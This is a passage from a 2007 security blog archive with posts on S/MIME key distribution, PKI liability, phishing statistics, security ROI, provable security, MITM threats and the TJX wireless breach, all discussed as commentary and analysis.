    On the other hand, a potential liability issue within a game would seem to be something that could be solved. After all, the game operator has all the control, and all the players are within their reach. Tonight's pop-quiz: Any suggestions on how to solve the potential for large/class-action suits circling around dodgy characters and identity?

    (Manual trackbacks: Perilocity suggests we need identity insurance in the form of governments taking the problem more seriously and dealing with identity thefts more proactively when they occur.)

    Posted by iang at 05:57 PM | Comments (0) | TrackBack

    September 01, 2007

    How S/MIME could suck slightly less with a simple GETSMIME

    I've been using S/MIME for around a year now for encrypted comms, and I can report that the overall process is easier than OpenPGP. The reasons are twofold:

    1. Thunderbird comes with S/MIME and not OpenPGP. Yes, I know there are plugins, but this decision by the developers is dominating.
    2. I work with a CA, and it is curious, to watch them work with their own product. Indeed, it's part of the job. (Actually they also do OpenPGP, but as we all know, OpenPGP works just fine without... See reason 1.)

    Sadly, S/MIME sucks. I reported previously on Thunderbird's most-welcome improvements to its UI (from unworkable to woeful) and also its ability to encrypt-not-sign, which catapulted the tool into legal sensibility. Recall, we don't know what a signature means, and the lawyers say "don't sign anything you don't read" ... I'd defy you to read an S/MIME signed email.

    The problem that then occurs is that the original S/MIME designers (early 1990s?) used an unfortunate trick which is now revealed as truly broken: the keys are distributable with signing.

    Ooops. Worse, the keys are only distributable with signing as far as I can see, which uncovers the drastic failings of tools designed by cryptographers and not software engineers. This sort of failure derives from such claims as, you must sign everything "to be trusted" ... which we disposed of above.

    So, as signing is turned off, we now need to distribute the keys. This occurs by 2 part protocol that works like this:

    • "Alice, please send me a signed email so I can only get your key."
    • "Bob, here is a signed email that only means you can get my key."

    With various error variations built in. OK, our first communal thought was that this would be workable but it turns out not to scale.

    Consider that we change email clients every 6 months or so, and there appears no way to export your key collection. Consider that we use other clients, and we go on holidays every 3 months (or vacations every 12 months), and we lose our laptops or our clients trash our repositories. Some of us even care about cryptographic sanitation, and insist on locking our private keys in our secured laptop in the home vault with guards outside. Which means we can't read a thing from our work account.

    Real work is done with a conspiracy of more than 2. It turns out that with around 6 people in the ring, someone is AFK ("away from keys"), all the time. So, someone cannot read and/or write. This either means that some are tempted to write in clear text (shame!), or we are all running around Alice-Bobbing each other. All the time.

    Now, of course, we could simply turn on signing. This requires (a) a definition of signing, (b) written somewhere like a CPS, (c) which is approved and sustainable in agreements, (d) advised to the users who receive different signature meanings, and (e) acceptance of all the preceeding points as meaningful. These are very tough barriers, so don't hold your breath, if we are talking about emails that actually mean something (kid sister, knock yourself out...).

    Turning on the signing also doesn't solve the core problem of key management, it just smothers it somewhat by distributing the keys every chance we get. It still doesn't solve the problem of how to get the keys when you lose your repository, as you are then locked out of posting out until you have everyone's keys. In every conspiracy, there's always one important person who's notoriously shy of being called Alice.

    This exposes the core weakness of key management. Public Key cryptography is an engineering concept of 2 people, and beyond that it scales badly. S/MIME's digsig-distro is just a hack, and something like OpenPGP's key server mechanism would be far more sensible, far more scaleable. However, I wonder if we can improve on even OpenPGP, as the mere appearance of a centralised server reduces robustness by definition (TTPs, CVP, central points of attack, etc).

    If an email can be used to send the key (signed), then why can't an email be used to request a key? Imagine that we added an email convention, a little like those old maillist conventions, that did this:

    Subject: GETSMIME fc@example.com

    and send it off. A mailclient like Thunderbird could simply reply by forwarding the key. (How this is done is an exercise for the reader. If you can't think of 3 ways in the next 3 minutes, you need more exercise.)

    Now, the interesting thing about that is that if Tbird could respond to the GETSMIME, we wouldn't need key servers. That is, Alice would simply mail Bob with "GETSMIME Carol@example.com" and Bob's client could respond, perhaps even without asking because Bob already knows Alice. Swarm key distro, in other words. Or, Dave could be a key server that just sits there waiting for the requests, so we've got a key server with no change to the code base.

    In closing, I'll just remind that the opinion of this blog is that the real solution to the almost infinite suckiness of S/MIME is that the clients should generate the keys opportunistically, and enable use of crypto as and when possible.

    This solution will never be ideal, and that's because we have to deal with email's legacy. But the goal with email is to get to some crypto, some of the time, for some of the users. Our current showing is almost no crypto, almost none of the time, for almost none of the users. Pretty dire results, and nothing a software engineer would ever admit to.

    Posted by iang at 07:47 PM | Comments (1) | TrackBack

    August 23, 2007

    Threatwatch: Numbers on phishing, who's to blame, the unbearable loneliness of 4%

    Jonath over at Mozilla takes up the flame and publishes lots of stats on the current state of SSL, phishing and other defences. Headline issues:

    • Number of SSL sites: 600,000 from Netcraft
    • Cost of phishing to US: $2.1 billion dollars.
    • Number of expired certs: 18%
    • Number of users who blame a glitch in the browser for popups: 4%

    I hope he keeps it up, as it will save this blog from having done it for many years :) The connection between SSL and phishing can't be overstressed, and it's welcome to see Mozilla take up that case. (Did I forget to mention TLS/SNI in Apache and Microsoft? Shame on me....)

    Jonath concludes with this odd remark:

    If I may be permitted one iota of conclusion-drawing from this otherwise narrative-free post, I would submit this: our users, though they may be confused, have an almost shocking confidence in their browsers. We owe it to them to maintain and improve upon that, but we should take some solace from the fact that the sites which play fast and loose with security, not the browsers that act as messengers of that fact, really are the ones that catch the blame.

    You, like me, may have read that too quickly, and thought that he suggests that the web sites are to blame, with their expired certs, fast and loose security, etc.

    But, he didn't say that, he simply said those are the ones that *are* blamed. And that's true, there are lots and lots of warnings out there like campaigns to drop SSL v2 and stop sites doing phishing training and other things ... The sites certainly catch the blame, that's definately true.

    But, who really *deserves* the blame? According to the last table in Jonath's post, the users don't really blame the site as much as might be expected: 24%. More are unsure and thus wise, I say: 32%. And yet more imagine an actual attack taking place: 40%.

    That leaves 4% who suspect a "glitch" in the browser itself. Surely one lonely little group there, I wonder if they misunderstood what a "glitch" is... What is a "glitch," anyway, and how did it get into their browsers?

    Posted by iang at 09:06 AM | Comments (0) | TrackBack

    August 09, 2007

    Shock of new Security Advice: "Consider a Mac!"

    From the where did you read it first? department here comes an interesting claim:

    Beyond obvious tips like activating firewalls, shutting computers down when not in use, and exercising caution when downloading software or using public computers, Consumer Reports offered one safety tip that's sure to inflame online passions: Consider a Mac.

    "Although Mac owners face the same problems with spam and phishing as Windows users, they have far less to fear from viruses and spyware," said Consumer Reports.

    Spot the difference between us and them? Consumer Report is not in the computing industry. What this suggests about being helpful about security will haunt computing psychologists for years to come.

    For amusement, count how many security experts will pounce on the ready excuse:

    "Because Macs are less prevalent than Windows-based machines, online criminals get less of a return on their investment when targeting them."

    Of course if that's true, it becomes less so with every Mac bought.

    Can you say "monoculture!?"



    The report itself from Consumer Reports seems to be for subscribers only. For our ThreatWatch series, the article has many juicy numbers:

    U.S. consumers lost $7 billion over the last two years to viruses, spyware, and phishing schemes, according to Consumer Report's latest State of the Net survey. The survey, based on a national sample of 2,000 U.S. households with Internet access, suggests that consumers face a 25% chance of being victimized online, which represents a slight decline from last year.

    Computer virus infections, reported by 38% of respondents, held steady since last year, which Consumer Reports considers to be a positive sign given the increasing sophistication of virus attacks. Thirty-four percent of respondents' computers succumbed to spyware in the past six months. While this represents a slight decline, according to Consumer Reports, the odds of a spyware infection remain 1 in 3 and the odds of suffering serious damage from spyware are 1 in 11.

    Phishing attacks remained flat, duping some 8% of survey respondents at a median cost of $200 per incident. And 650,000 consumers paid for a product or service advertised through spam in the month before the survey, thereby seeding next year's spam crop.

    Perversely, insecurity means money for computer makers: Computer viruses and spyware turn out to be significant drivers of computer sales. According to the study, virus infections drove about 1.8 million households to replace their computers over the past two years. And over the past six months, spyware infestations prompted about 850,000 households replace their computers.

    Posted by iang at 07:36 AM | Comments (0) | TrackBack

    August 08, 2007

    WebMoney does a gold unit

    Dani reports that WebMoney is now doing a DGC or gold based currency.

    This is big news for the gold community, as there is currently (I am told) a resurgance of interest in new gold issuers, perhaps on the expectation that e-gold does not survive the meatgrinders, also known as the Federal prosecutors in Washington D.C. (Perhaps as part of their defence strategy, e-gold now run a blog!)

    What's different about WebMoney? They had financial cryptography thinkers in at the beginning, it seems, and they are successful. They know how to do this stuff. They did it, and they maintained their innovation base. They are big. They do multiple countries. They quite possibly dwarf any other gold operator in overall size, already. I could run through the checklist for a while, and it looks pretty good. (oh, and they do a downloadable client which does some sort of facsimile of blinded transactions, as presented at EFCE!)

    Expect them to take off where e-gold left off, with the exception of the Ponzi based traffic. Big strategic question: will they go green or red on Ponzis?

    Posted by iang at 10:52 AM | Comments (3) | TrackBack

    Microsoft asserts itself as an uber-CA

    In the PKI ("public key infrastructure") world, there is a written practice that the user, sometimes known as the relying party, should read the CPS ("certificate practice statement") and other documents before being qualified to rely on a certificate. This would qualify as industry practice and is sensible, at least on the face of it, in that the CA ("certificate authority") can not divine what you are going to use the cert for. Ergo, the logic goes, as relying party, you have to do some of the work yourself.

    However, in the "PKI-lite" that is in place in x.509 browser and email world, this model has been simplified. Obviously, all of us who've come into contact with user software and the average user know that the notion of a user reading a CPS is so ludicrous that it's hardly worth discussing. Of course, we need another answer.

    There are many suggestions, but the one that is in effect is that the browser, or more precisely, the software vendor, is the one who reads the CPS, on behalf of the users. One way to look at this is that this makes the browser the relying party by proxy, as, in making its assessment, it reads the CPS, measures it against own needs, and relies on audits and other issues. (By way of disclosure, I audit a CA.)

    Unfortunately, it cannot be the relying party because it simply isn't a party to any transaction. The user remains the relying party, but isn't encouraged to do any of the relying and reading stuff that was mentioned above. That is, the user is encouraged to rely on the certificate, the vendor, the CA and the counter-party, all on an article of blind faith in these people and processes she has never heard of.

    This dilemma is better structured as multi-tiered authorities: The CA is the authority on the certificates and their "owners." The software vendor is the authority on the CAs, by means of their CPSs, audits, etc.

    Such a re-drawing of the map has fairly dramatic consequences for the PKI. The widespread perception is that the CA is highly liable -- because that's the "trust" product that they sell -- and the browser is not. In principle, and in contract law, it might be the other way around, as the browser has an agreement with the user, and the CA has not. Where the perception might find comfort is in the doctrine of duty of care but that will generally limit the CA's liability to gross negligence. Either way, the last word on this complicated arrangement might need real lawyers and eventually real courts.

    It has always been somewhat controversial to suggest that the browser is in control, and therefore may need to consider risks, liabilities and obligations. But now, Paul Hoffman has published a rather serious piece of evidence that Microsoft, for its part, has taken on the R/L/O more seriously than thought:

    If a user running Windows XP SP2 in its default configuration removes a root certificate that is one that Microsoft trusts, Windows will re-install that root certificate and again start to trust certificates that come from that root without alerting the user. This re-installation and renewed trust happens as soon as the user visits a SSL-based web site using Internet Explorer or any other web browser that uses the Cryptographic Application Programming Interface (CAPI) built-in to Windows; it will also happen when the user receives secure email using Outlook, Microsoft Mail, or another mail program that uses CAPI, as long as that mail is signed by a certificate that is based on that root certificate.

    In effect, the user is not permitted by the software to make choices of reliance. To complete the picture, Paul was careful to mention the variations (Thunderbird and Firefox are not effected, there is an SP2 feature to disable all updates of roots, Vista has the same problem but no override...).

    This supports the claim, as I suggested above, that the effective state of play -- best practices if you'll pardon the unfortunate term -- is that the software vendor is the uber-CA.

    If we accept this conclusion, then we could conceivably get on and improve security within these limitations, that the user does little or nothing, and the software manufacturer decides everything they possibly can. OK, what's wrong with that? From an architectural position, nothing, especially if it is built-in up-front. Indeed this is one of the core design decisions of the best-of-security-breed applications (x9.59, Skype, SSH, Ricardo, etc. Feel free to suggest any others to the list, it's short and it's lonely.)

    The problem lies in that software control is not stated up-front, and it is indeed denied by large swathes of securityland. I'd not be surprised if Microsoft themselves denied it (and maybe their lawyers would be right, given the rather traumatic link between phishing and mitm-proof-certificates...). The PKI state-of-denial leaves us in a little bit of a mess:

    • uber-CAs probably have some liability, but will likely deny it
    • users are supposed to read the CPS, then rely. But don't or won't, and do.
    • CAs claim to the users as if they have the liability, but write the CPS as if they have none.
    • developers read from the PKI practices book, and write code according to uber-policy...
    • (We can add many other issues which lead PKI into harm, but we are well past the average issue saturation point already.)

    To extract from this mess probably takes some brave steps. I think I applaud Microsoft's practice, in that at least this makes that little part clearer.

    They are in control, they are (I suggest) a party with risks, liabilities and obligations, so they should get on and make the product as secure as possible, as their primary goal. This includes throwing out bits of PKI best practices that we know to be worst practices.

    They are not the only ones. Mozilla Foundation in recent years has completed a ground-breaking project to define their own CA processes, and this evidences great care and attention, especially in the ascension of the CA to their root list. What does this show other than they are a party of much power, exercising their duty of care?

    Like Microsoft, they (only) care about their users, so they should (only) consider their users, in their security choices.

    Will the CAs follow suit and create a simpler, more aligned product? Possibly not, unless pushed. As a personal remark, the criteria I use in auditing are indeed pushing dramatically in the direction of better care of risks, liabilities and obligations. The work to go there is not easy nor trivial, so it is no wonder that no CA wants to go there (and that may be an answer to those asking why it is taking so long).

    Even if every CA stood forth and laid out a clear risks, liabilities and obligations statement before their relying parties, more would still need to be done. Until the uber-CAs also get on board publically with the liability shift and clearly work with the ramifications of it, we're still likely locked in the old PKI-lite paper regime or shell game that nobody ever used nor believed in.

    For this reason, Microsoft is to be encouraged to make decisions that help the user. We may not like this decision, or every decision, but they are the party that should make them. Old models be damned, as the users surely are in today's insecurity, thanks in part to those very same models.

    Posted by iang at 07:14 AM | Comments (4) | TrackBack

    August 07, 2007

    Security can only be message-based?

    Reading this post from Robert Watson:

    I presented, “Exploiting Concurrency Vulnerabilities in System Call Wrappers,” a paper on the topic of compromising system call interposition-based protection systems, such as COTS virus scanners, OpenBSD and NetBSD’s Systrace, the TIS Generic Software Wrappers Toolkit (GSWTK), and CerbNG. The key insight here is that the historic assumption of “atomicity” of system calls is falacious, and that on both uniprocessor and multiprocessing systems, it is trivial to construct a race between system call wrappers and malicious user processes to bypass protections. ...

    The moral, for those unwilling to read the paper, is that system call wrappers are a bad idea, unless of course, you’re willing to rewrite the OS to be message-passing.

    And it sparked a thought that systems can only be secure if message-based. Maybe it's a principle, maybe it's a hypothesis, or maybe it's a law.

    (My underlining.) To put this in context, if a system was built using TCP/IP, it's not built with security as its number one, overriding goal. That might be surprising to some, as pretty much all systems are built that way; which is the point, such an aggressive statement partly explains where we are, and partly explains how tricky this stuff is.

    (To name names: SSH is built that way. Sorry, guys. Skype is a hybrid, with both message-passing and connections. Whether it is internally message-passing or connection-oriented I don't know, but I can speculate from my experiences with Ricardo. That latter started out message-passing over connection-oriented, and required complete client-side rewrites to remove the poison. AADS talks as if it is message-passing, and that might be because it is from the payments world, where there is much better understanding of these things.)

    Back to theory. We know from the coordination problem, or the Two Generals problem, that protocols cannot be reliable about what they have sent to the other side. We also know from cryptography that we can create a reliable message on the receive-side (by means of an integrated digsig). We know that reliabile connections are not.

    Also, above, read that last underlined sentence again. Operating systems guys have known for the longest time that the cleanest OS design was message passing (which they didn't push because of the speed issues):

    Concurrency issues have been discussed before in computer security, especially relating to races between applications when accessing /tmp, unexpected signal interruption of socket operations, and distributed systems races, but this paper starts to explore the far more sordid area of OS kernel concurrency and security. Given that even notebook computers are multiprocessor these days, emphasizing the importance of correct synchronization and reasoning about high concurrency is critical to thinking about security correctly. As someone with strong interests in both OS parallelism and security, the parallels (no pun intended) seem obvious: in both cases, the details really matter, and it requires thinking about a proverbial Cartesian Evil Genius. Anyone who’s done serious work with concurrent systems knows that they are actively malicious, so a good alignment for the infamous malicious attacker in security research!

    But none of that says what I asserted above: that if security is your goal, you must choose message-passing.

    Is this intuition? Is there a theory out there? Where are we on the doh!-to-gosh scale?

    Posted by iang at 11:09 AM | Comments (1) | TrackBack

    July 20, 2007

    ROI: security people counting with fingers?

    A curious debate erupted over whether there is ROI on security investments. Normally sane Chris Walsh points to normally sensible Richard Bejtlich seems to think that because a security product saves money and cannot make money on its own, therefore it is not an investment, and therefore there cannot be ROI.

    The problem the "return on security investment" (ROSI) crowd has is they equate savings with return. The key principle to understand is that wealth preservation (saving) is not the same as wealth creation (return).

    If you use your fingers to count, you will have problems. The issue here is a simple one of negative numbers and the distinctions between absolute and relative calculations.

    Here's how it works. Invent Widget. Widget generates X in revenue, per unit, which includes some small delta x in shrinkage or loss. Call it 10% of $100 so we are at an X of $90 of revenues.

    Now, imagine a security tool that reduces the shrinkage by half. X' improves by $5. As X' of $95 is an improvement in your basic position of X at $90, this can then be calculated as an ROI (however that is done).

    What then is the fallacy? One way to put it is like this (edited from original):

    The "savings" you get back are what you already own, and you only need to claw them back.

    No such, you don't have it, so it isn't yours to calculate, and resting on some moral or legal position is nonsense. The thief laughs at you, even if the blog evidence is that nobody else notices the joke, including economists who should know better! The thing that Richard is talking about is not "savings" in economic terms but "sunk costs."

    In business terms, too, all numbers and formulas are just models. As the fundamental requirement is here to compare different investments then as long as we treat "savings" or "shrinkage" or "sunk costs" or whatever the same way in each instance of the model, the result is comparable. Mathematics simply treats minus numbers as backwards of positive numbers, it doesn't refuse to do it. A "savings" is just a negative number taken from another positive number that might be called "ideal maximum".

    Having said all that, Richard's other points are spot on:

    • Calculating ROI is wrong, it should be NPV. If you are not using NPV then you're out of court, because so much of security investment is future-oriented.
    • Predicting the "savings" from a security investment is hard. There are few metrics, and they are next to useless. No security seller will give them to you. So you are left predicting from no base of information.
    • Hence excessively hopeful interest in metrics conferences and breach reports. But, I like Richard treat that skeptically. Yes, it will help. No, it won't make the NPV calculations anywhere near useful enough to be accurate.
    • NPV is therefore not going to help that much because they are wildly unfounded in their predictions. NPV therefore suffers from GIGO -- garbage-in-garbage-out! (more)
    • You need something else.

    In closing, it still remains the case that security people say their managers don't understand security. And, as above, managers are safe in assuming that security people don't understand business. Another point that is starting to become more widely accepted, thank heavens, again spotted recently from sensibly sane Arthur ( Chris Walsh :).

    Posted by iang at 09:05 AM | Comments (9) | TrackBack

    July 05, 2007

    Metricon 2.0 -- Boston, 7.Aug.2007 -- talks announced

    Gunnar Peterson writes The agenda for Metricon 2.0 in Boston August 7th has been set. Metricon is co-located with Usenix security conference. The details, travel info, registration, and agenda are here.

    There are a limited number of openings so please REGISTER SOON if interested in attending. A summary of the presentations:

  • "Do Metrics Matter?"
  • "Security Meta Metrics--Measuring Agility, Learning, and Unintended
    Consequence"
  • "Security Metrics in Practice: Development of a Security Metric System to
    Rate Enterprise Software"
  • "A Software Security Risk Classification System"
  • "Web Application Security Metrics"
  • "Operational Security Risk Metrics: Definitions, Calculations, and
    Visualizations"
  • "Metrics for Network Security Using Attack Graphs: A Position Paper"
  • "Software Security Weakness Scoring"
  • "Developing secure applications with metrics in mind"
  • "Correlating Automated Static Analysis Alert Density to Reported Vulnerabilities in Sendmail"

    The Read more....

    Posted by iang at 02:09 AM | Comments (0) | TrackBack
  • May 22, 2007

    No such thing as provable security?

    I have a lot of skepticism about the notion of provable security.

    To some extent this is just efficient hubris -- I can't do it so it can't be any good. Call it chutzpah, if you like, but there's slightly more relevance to that than egotism, as, if I can't do it, it generally signals that businesses will have a lot of trouble dealing with it. Not because there aren't enough people better than me, but because, if those that can do it cannot explain it to me, then they haven't got much of a chance in explaining it to the average business.

    Added to that, there have been a steady stream of "proofs" that have been broken, and "proven systems" that have been bypassed. If you look at it from a scientific investigative point of view, generally, the proof only works because the assumptions are so constrained that they eventually leave the realm of reality, and that's particularly dangerous to do in security work.

    Added to all that: The ACM is awarding its Godel prize for a proof that there is no proof:

    In a paper titled "Natural Proofs" originally presented at the 1994 ACM STOC, the authors found that a wide class of proof techniques cannot be used to resolve this challenge unless widely held conventions are violated. These conventions involve well-defined instructions for accomplishing a task that rely on generating a sequence of numbers (known as pseudo-random number generators). The authors' findings apply to computational problems used in cryptography, authentication, and access control. They show that other proof techniques need to be applied to address this basic, unresolved challenge.

    The findings of Razborov and Rudich, published in a journal paper entitled "Natural Proofs" in the Journal of Computer and System Sciences in 1997, address a problem that is widely considered the most important question in computing theory. It has been designated as one of seven Prize Problems by the Clay Mathematics Institute of Cambridge, Mass., which has allocated $1 million for solving each problem. It asks - if it is easy to check that a solution to a problem is correct, is it also easy to solve the problem? This problem is posed to determine whether questions exist whose answer can be quickly checked, but which require an impossibly long time to solve.

    The paper proves that there is no so-called "Natural Proof" that certain computational problems often used in cryptography are hard to solve. Such cryptographic methods are critical to electronic commerce, and though these methods are widely thought to be unbreakable, the findings imply that there are no Natural Proofs for their security.

    If so, this can count as a plus point for risk management, and a minus point for the school of no-risk security. However hard you try, any system you put in place will have some chances of falling flat on its face. Deal with it; the savvy financial cryptographer puts in place a strong system, then moves on to addressing what happens when it breaks.

    The "Natural Proofs" result certainly matches my skepticism, but I guess we'll have to wait for the serious mathematicians to prove that it isn't so ... perhaps by proving that it is not possible to prove that there is no proof?

    Posted by iang at 08:21 AM | Comments (3) | TrackBack

    May 21, 2007

    When to bolt on the security afterwards...

    For some obscure reason, this morning I ploughed through the rather excellent but rather deep tome of Peter Gutmann's Cryptographic Security Architecture - Design and Verification (or at least an older version of chapter 2, taken from his thesis).

    He starts out by saying:

    Security-related functions which handle sensitive data pervade the architecture, which implies that security needs to be considered in every aspect of the design, and must be designed in from the start (it’s very difficult to bolt on security afterwards).

    And then spends much of the chapter showing why it is very difficult to design it in from the start.

    When, then, to design security in at the beginning and when to bolt it on afterwards? In my Hypotheses and in the GP essays I suggest it is impractical to design the security in up-front.

    But there still seems to be a space where you do exactly that: design the security in up-front. If Peter G can write a book about it, if security consultants take it as unquestionable mantra, and if I have done it myself, then we need to bring these warring viewpoints closer to defined borders, if not actual peace.

    Musing on this, it occurs to me that we design security up front when the mission is security . And, not, if not. What this means is open to question, but we can tease out some clues.

    A mission is that which when you have achieved it, you have succeeded, and if you have not, you have failed. It sounds fairly simple when put in those terms, and perhaps an example from today's world of complicated product will help.

    For example a car. Marketing demands back-seat DVD players, online Internet, hands-free phones, integrated interior decorative speakers, two-tone metallised paint and go-faster tail trim. This is really easy to do, unless you are trying to build a compact metal box that also has to get 4 passengers from A to B. That is, the mission is transporting the passengers, not their entertainment or social values.

    This hypothesis would have it that we simply have to divide the world's applications into those where security is the mission, and those where some other mission pertains.

    E.g., with payment systems, we can safely assume that security is the mission. A payment system without security is an accounting system, not a payment system. Similar logic with an Internet server control tool.

    With a wireless TCP/IP device, we cannot be so dismissive; an 802.11 wireless internet interface is still good for something if there is no security in it at all. A wireless net without security is still a wireless net. Similar logic with a VoIP product.

    (For example, our favourite crypto tools, SSH and Skype, fall on opposing sides of the border. Or see the BSD's choice.)

    So this speaks to requirements; a hypothesis might be that in the phase of requirements, first establish your mission. If your mission speaks to security, first, then design security up front. If your mission speaks to other things, then bolt on the security afterwards.

    Is it that simple?

    Posted by iang at 07:01 AM | Comments (5) | TrackBack

    May 08, 2007

    Threatwatch: Still searching for the economic MITM

    One of the things we know is that MITMs (man-in-the-middle attacks) are possible, but almost never seen in the wild. Phishing is a huge exception, of course. Another fertile area is wireless lans, especially around coffee shops. Correctly, people have pointed to this point as a likely area where MITMs would break out.

    Incorrectly, people have typically confused possibility with action. Here's the latest "almost evidence" of MITMs, breathtakingly revealed by the BBC:

    In a chatroom used to discuss the technique, also known as a 'man in the middle' attack, Times Online saw information changing hands about how security at wi-fi hotspots – of which there are now more than 10,000 in the UK – can be bypassed.

    During one exchange in a forum entitled 'T-Mobile or Starbucks hotspot', a user named aarona567 asks: "will a man in the middle type attack prove effective? Any input/suggestions greatly appreciated?"

    "It's easy," a poster called 'itseme' replies, before giving details about how the fake network should be set up. "Works very well," he continues. "The only problem is,that its very slow ~3-4 Kb/s...."

    Another participant, called 'baalpeteor', says: "I am now able to tunnel my way around public hotspot logins...It works GREAT. The dns method now seems to work pass starbucks login."

    Now, the last paragraph is something else, it is referring to the ability to tunnel through DNS to get uncontrolled access to the net. This is typically possible if you run your own DNS server and install some patches and stuff. This is useful, and economically sensible for anyone to do, although technically it may be infringing behaviour to gain access to the net from someone else's infrastructure (laws and attitudes varying...).

    So where's the evidence of the MITM? Guys talking about something isn't the same as doing it (and the penultimate paragraph seems to be talking about DNS tunnelling as well). People have been demoing this sort of stuff at conferences for decades ... we know it is possible. What we also know is that it is not a good use of your valuable time as a crim. People who do this sort of thing for a living search for techniqes that give low visibility, and high gathering capability. Broadcasting in order to steal a single username and password fails on both counts.

    If we were scientists, or risk-based security scholars, what we need is evidence that they did the MITM *and* they committed a theft in so doing it. Only then can we know enough to allocate the resources to solving the problem.

    To wrap up, here is some *credible* news that indicates how to economically attack users:

    Pump and dump fraudsters targeting hotels and Internet cafes, says FBI Cyber crooks are installing key-logging malware on public computers located in hotels and Internet cafes in order to steal log-in details that are used to hack into and hijack online brokerage accounts to conduct pump and dump scams.

    The US Federal Bureau of Investigation (FBI) has found that online fraudsters are targeting unsuspecting hotel guests and users of Internet cafes.

    When investors use the public computers to check portfolios or make a trade, fraudsters are able to capture usernames and passwords. Funds are then looted from the brokerage accounts and used to drive up the prices of stocks the frudsters had bought earlier. The stock is then sold at a profit.

    In an interview with Bloomberg reporters, Shawn Henry, deputy assistant director of the FBI's cyber division, said people wouldn't think twice about using a computer in an Internet cafe or business centre in a hotel, but he warns investors not to use computers they don't know are secure.

    Why is this credible, and the other one not? Because the crim is not sitting there with his equipment -- he's using the public computer to do all the dangerous work.

    Posted by iang at 02:18 PM | Comments (1) | TrackBack

    May 07, 2007

    WSJ: Soft evidence on a crypto-related breach

    Unconfirmed claims are being made on WSJ that the hackers in the TJX case did the following:

    1. sat in a carpark and listened into a store's wireless net.
    2. cracked the WEP encryption.
    3. scarfed up user names and passwords ....
    4. used that to then access centralised databases to download the CC info.
    The TJX hackers did leave some electronic footprints that show most of their break-ins were done during peak sales periods to capture lots of data, according to investigators. They first tapped into data transmitted by hand-held equipment that stores use to communicate price markdowns and to manage inventory. "It was as easy as breaking into a house through a side window that was wide open," according to one person familiar with TJX's internal probe. The devices communicate with computers in store cash registers as well as routers that transmit certain housekeeping data.

    After they used that data to crack the encryption code the hackers digitally eavesdropped on employees logging into TJX's central database in Framingham and stole one or more user names and passwords, investigators believe. With that information, they set up their own accounts in the TJX system and collected transaction data including credit-card numbers into about 100 large files for their own access. They were able to go into the TJX system remotely from any computer on the Internet, probers say.

    OK. So assuming this is all true (and no evidence has been revealed other than the identity of the store where it happened), what can we say? Lots, and it is all unpopular. Here's a scattered list of things, with some semblance of connectivity:

    a. Notice how the crackers still went for the centralised database. Why? It is validated information, and is therefore much more valuable and economic. The gang was serious and methodical. They went for the databases.

    Conclusion: Eavesdropping isn't much of a threat to credit cards.

    b. Eavesdropping is a threat to passwords, assuming that is what they picked up. But, we knew that way back, and that exact threat is what inspired SSH: eavesdroppers sniffing for root passwords. It's also where SSL is most sensibly used.

    c. Eavesdropping is a threat, but MITM is not: by the looks of it, they simply sat there and sucked up lots of data, looking for the passwords. MITMs are just too hard to make them economic, *and* they leave tracks. "Who exactly is it that is broadcasting from that car over there....?"

    (For today's almost evidence of the threat of MITMs see the BBC!)

    d. Therefore, SSL v1 would have been sufficient to protect against this threat level. SSL v2 was overkill, and over-expensive: note how it wasn't deployed to protect the passwords from being eavesdropped. Neither was any other strong protocol. (Standard problem: most standardised security protocols are too heavy.)

    TJX and 45 million americans say "thanks, guys!" I reckon it is going to take the other 255 million americans to lose big time before this lesson is attended to.

    e. Why did they use a weak crypto protocol? Because it is the one delivered in the hardware.

    Question: Why is hardware often delivered with weak crypto?

    f. And, why was a weak crypto protocol chosen by the WEP people? And why are security observers skeptical that the new replacement for WEP will last any longer? The solution isn't in the "guild" approach I mentioned earlier, so forget ranting about how people should use a good security expert. It's in the institutional factors: security is inversely proportional to the number of designers. And anything designed by an industry cartel has a lot of designers.

    g. Even if they had used strong crypto, could the breach have happened? Yes, because the network was big and complex, and the hackers could have simply plugged into some place elsewhere. Check out the clue here:

    The hackers in Minnesota took advantage starting in July 2005. Though their identities aren't known, their operation has the hallmarks of gangs made up of Romanian hackers and members of Russian organized crime groups that also are suspected in at least two other U.S. cases over the past two years, security experts say. Investigators say these gangs are known for scoping out the least secure targets and being methodical in their intrusions, in contrast with hacker groups known in the trade as "Bonnie and Clydes" who often enter and exit quickly and clumsily, sometimes strewing clues behind them.

    Recall that transactions are naked and vulnerable . Because the data is seen in so many places, savvy FCers assume the transactions are visible by default, and thus vulnerable unless intrinsically protected.

    h. And, even if the entire network had been protected by some sort of overarching crypto protocol like WEP, the answer is to take over a device. Big stores means big networks means plenty of devices to take over.

    i. Which leaves end-to-end encryption. The only protection you can really count on is end-to-end. WEP, WPA and IPSec and other such infrastruction-level systems are only a hopeful answer to an easy question, end-to-end security protocols are the real answer to application level questions.

    (e.g., they could have used SSL for protecting the password access to the databases, end to end. But they didn't.)

    j. The other requirement is to make the data insensitive to breaches. That is, even if a crook gets all the packets, he can't do anything with them. Not naked, as it were. End-to-end encryption then becomes a privacy benefit, not a security necessity.

    However, to my knowledge, only Ricardo and AADS deliver this, and most other designers are still wallowing around in the mud of encrypted databases. A possible exception to this is the selective disclosure approach ... but for various business reasons that is even less likely to field than Ricardo and AADS were.

    k. Why don't we use more end-to-end encryption with naked transaction protocols? One reason is that they don't scale: we have to write one for each application. Another reason is that we've been taught not to by generations: "you should use a standard security product." ... as seen by TJX, who *did* use a standard security product.

    Conclusion: Security advice is "lowest common denominator" grade. The best advice is to use a standard product that is inapplicable to the problem area, and if that's the best advice, that also means there aren't enough FC-grade people to do better.

    l. "Oh, we didn't mean that one!" Yeah, right. Tell us how to tell? Better yet, tell the public how to tell. They are already being told to upgrade to WPA, as if improving 1% of their network from 20% security to 80% security is going to help.

    m. In short, people will seize on the encryption angle as the critical element. It isn't. If you are starting to get to the point of confusion due to the multiplying conflicts, silly advice, and sense of powerless the average manager has, you're starting to understand.

    This is messy stuff, and you can pretty much expect most people to not get it right. Unfortunately, most security people will get it wrong too in a mad search for the single most important mistake TJX made.

    The real errors are systemic: why are they storing SSNs anyway? Why are they using a single number for the credit card? Why are retail transactions so pervasively bound with identity, anyway? Why is it all delayed credit-based anyway?

    Posted by iang at 02:27 PM | Comments (4) | TrackBack

    April 28, 2007

    US moves to freeze Gold payment reserves

    The gold community is a-buzz with the news ... first an announcement from BullionVault (no URL):

    There have been growing stresses on our relationship with Brinks Inc, the US-owned vault operator, and it has become clear that they feel uncomfortable about continuing to vault BullionVault gold.

    Why this might be so I am genuinely unable to say. Their exact reasoning has not been disclosed to us.

    Fortunately, there is an excellent alternative available to us in ViaMat International, the largest Swiss-owned vault operator, and one which has a full quota of internationally located professional bullion vaults.

